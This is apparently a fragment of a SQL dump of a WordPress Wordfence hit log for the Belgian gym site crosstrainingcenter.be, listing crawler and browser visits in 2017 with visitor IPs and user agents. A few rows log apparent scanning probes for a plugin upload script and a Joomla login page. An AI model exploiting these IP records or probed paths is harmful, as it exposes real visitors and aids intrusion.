(69148, 1491793924.072562, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69149, 1491794086.001481, 2297635928, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69150, 1491794086.466762, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69151, 1491794108.151044, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69152, 1491794113.187658, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69153, 1491794117.610574, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69154, 1491797754.267323, 3657087992, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(69155, 1491797897.197510, 135738378, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko'),
(69156, 1491798908.169853, 872548958, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'ltx71 - (http://ltx71.com/)'),
(69157, 1491800289.263123, 3657087992, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(69158, 1491803556.230533, 3657087992, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(69159, 1491808485.572123, 3657087992, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(69160, 1491809471.376588, 3475901941, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69161, 1491815543.708085, 1570674758, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69162, 1491815547.418247, 100662546, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69163, 1491817070.220710, 3475901917, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69164, 1491817117.496361, 3657087992, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(69165, 1491817579.308440, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(69166, 1491817579.994207, 1538306626, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69167, 1491817580.615393, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69168, 1491817581.118309, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69169, 1491817581.660927, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69170, 1491817582.227779, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69171, 1491817582.839268, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69172, 1491817583.343362, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69173, 1491817583.816990, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69174, 1491817584.349489, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69175, 1491817584.894862, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69176, 1491820064.562780, 1567842264, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://burger-imperia.com/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36'),
(70970, 1493442505.435741, 1540531433, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Opera/9.80 (Windows NT 6.1) Presto/2.12 Version/12.15'),
(70971, 1493449001.037064, 2745971880, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/ubh/up.php', 'http://www.crosstrainingcenter.be/wp-content/plugins/ubh/up.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(70972, 1493453422.995921, 3162553515, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70973, 1493463277.121586, 635303436, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/gravityforms/css/preview.css', '', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)'),
(70974, 1493463947.229712, 1538506743, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(70975, 1493463949.142741, 1538506743, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(70976, 1493463968.161105, 1538506743, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(70977, 1493464098.611255, 1538506743, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(70978, 1493464104.688086, 1538506743, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(70979, 1493469508.299367, 3107604753, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70980, 1493469532.449067, 3107604753, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70981, 1493471066.992549, 2760155453, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(70982, 1493471087.023984, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(70983, 1493478794.201639, 1123631646, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70984, 1493478794.757810, 1123631646, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70985, 1493479458.561133, 2366148252, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70986, 1493479462.261989, 2366148120, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70987, 1493479480.721963, 2996485381, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70988, 1493479486.982820, 2996488207, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70989, 1493481234.271104, 1123631762, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70990, 1493481235.183386, 1123631630, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70991, 1493481235.617677, 1123631630, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70992, 1493486958.845977, 1570674703, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70993, 1493490577.312401, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(70994, 1493490578.854672, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70995, 1493490579.335043, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70996, 1493490579.749951, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70997, 1493490580.767832, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70998, 1493490581.184609, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70999, 1493490581.599107, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71000, 1493490582.163784, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(71001, 1493490582.563298, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71002, 1493490582.961355, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71003, 1493490583.379156, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71004, 1493490583.820294, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71005, 1493490584.211603, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71006, 1493490584.608737, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71007, 1493491708.962157, 2297635928, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71008, 1493491710.245315, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71009, 1493491720.786446, 2297635928, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/sitemap.xml', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71010, 1493491725.849907, 2297635928, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/sitemap.xml', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71011, 1493491738.152370, 2297635928, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71012, 1493491746.167059, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71013, 1493491752.841365, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71014, 1493491761.944590, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71015, 1493491767.023871, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71016, 1493491776.424484, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71017, 1493491788.878847, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71018, 1493491801.709688, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71019, 1493491809.516200, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71020, 1493491819.552945, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71021, 1493491829.837192, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71022, 1493491918.049338, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71023, 1493491929.420289, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71024, 1493492926.203498, 2637637379, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71025, 1493493052.012638, 2637637511, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71026, 1493493826.876417, 1538461206, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8'),
(71027, 1493493828.718095, 1538461206, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8'),
(71028, 1493493879.532217, 1375112542, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71029, 1493493880.293354, 1375112542, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71030, 1493493880.839725, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71031, 1493493881.472847, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71032, 1493493882.004078, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71033, 1493493882.526857, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71034, 1493493883.204412, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71035, 1493493883.768890, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71036, 1493493884.267833, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71037, 1493493884.787546, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71038, 1493493885.194622, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71039, 1493501073.111919, 1123634273, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71040, 1493508375.731000, 1123634273, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71041, 1493509970.565093, 1374774657, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71042, 1493509977.413826, 1374774657, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71043, 1493512506.259914, 1450079886, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/533.95.42 (KHTML, like Gecko) Version/5.3.8 Safari/531.87'),
(71044, 1493512513.385097, 1450079886, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/533.95.42 (KHTML, like Gecko) Version/5.3.8 Safari/531.87'),
(71045, 1493512717.908982, 3233510666, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/component/users/?view=login', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),
(71046, 1493512721.181583, 3233510666, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/component/users/?view=login', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),
(71047, 1493514818.632723, 3024883603, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(71048, 1493517534.971313, 1123631630, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71049, 1493518445.545983, 1123634273, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71050, 1493519677.146542, 1123634273, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71051, 1493523355.796762, 1123634273, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71052, 1493533088.034695, 1123631630, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71053, 1493533291.984593, 3475901821, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71054, 1493533716.402841, 2637637474, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71055, 1493536220.815798, 676177816, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71056, 1493536220.877966, 676177816, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71057, 1493539969.663714, 2637637590, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71058, 1493567251.456215, 3024883468, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(71059, 1493569769.596676, 3657084251, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(71060, 1493570884.778342, 1375112542, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71061, 1493570885.446928, 1375112542, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71062, 1493570885.872599, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71063, 1493570886.306168, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71064, 1493570886.739696, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71065, 1493570887.225123, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
